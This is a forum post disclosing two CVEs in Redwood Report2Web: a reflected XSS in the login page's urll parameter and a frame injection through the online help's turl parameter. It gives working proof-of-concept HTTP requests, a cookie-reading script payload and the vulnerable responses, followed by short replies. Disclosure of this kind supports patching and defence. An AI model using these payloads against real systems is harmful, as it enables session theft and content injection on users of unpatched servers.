Redwood Report2Web CVE-2021-26710 and CVE-2021-26711

Web Hacking
1

Redwood Report2Web v4.3.4.5 and v4.5.3 are vulnerable to XSS. v4.3.4.5 is also vulnerable to frame injection. These are the vulnerable versions to the best of my knowledge. Both issues seem fixed after v4.6.0.

Report2Web Login Panel XSS [CVE-2021-26710]

The value of the urll parameter is getting reflected without any sanitization, allowing a remote attacker to inject javascript code to the victim’s browser, by using a simple payload "><script>alert(1)</script>

Request:

GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=F291E04B316ED2DF72623ACEA8D952CA; r2wctg=3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Response:

...
<form name="form" action="signIn.do" method="post" onsubmit="return handleSubmit(this);">
 <input type="hidden" name="id" value="" />
 <input type="hidden" name="language" value="en" />
 <input type="hidden" name="urll" value=""><script>alert(document.cookie)</script>" />
 
<div class="outer">
...

xss
xss1549×340 19.4 KB

Report2Web Online Help Frame Injection [CVE-2021-26711]

The turl parameter takes a local path as input and diplays it’s content inside a frame, e.g. ?turl=/local/path/doc.html. Although LFI isn’t possible, you can bypass the protection by using \/hostname.tld which the browser translates to //hostname.tld and then to https://hostname.tld, loading an external resource inside the frame and leading to vulnerabilities like XSS and content injection.

Request:

GET /r2w/help/Online_Help/NetHelp/default.htm?turl=\/example.com HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Response:

...
<frame id="right" name="right" title="Topic text" src="\/example.com">
...

example
example1920×595 47.6 KB

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26711

6 Likes
2

two CVE’s in the bag :ok_hand: :+1:

2 Likes
3

thanks messede
will definitely try to master it.

4

This topic was automatically closed after 121 days. New replies are no longer allowed.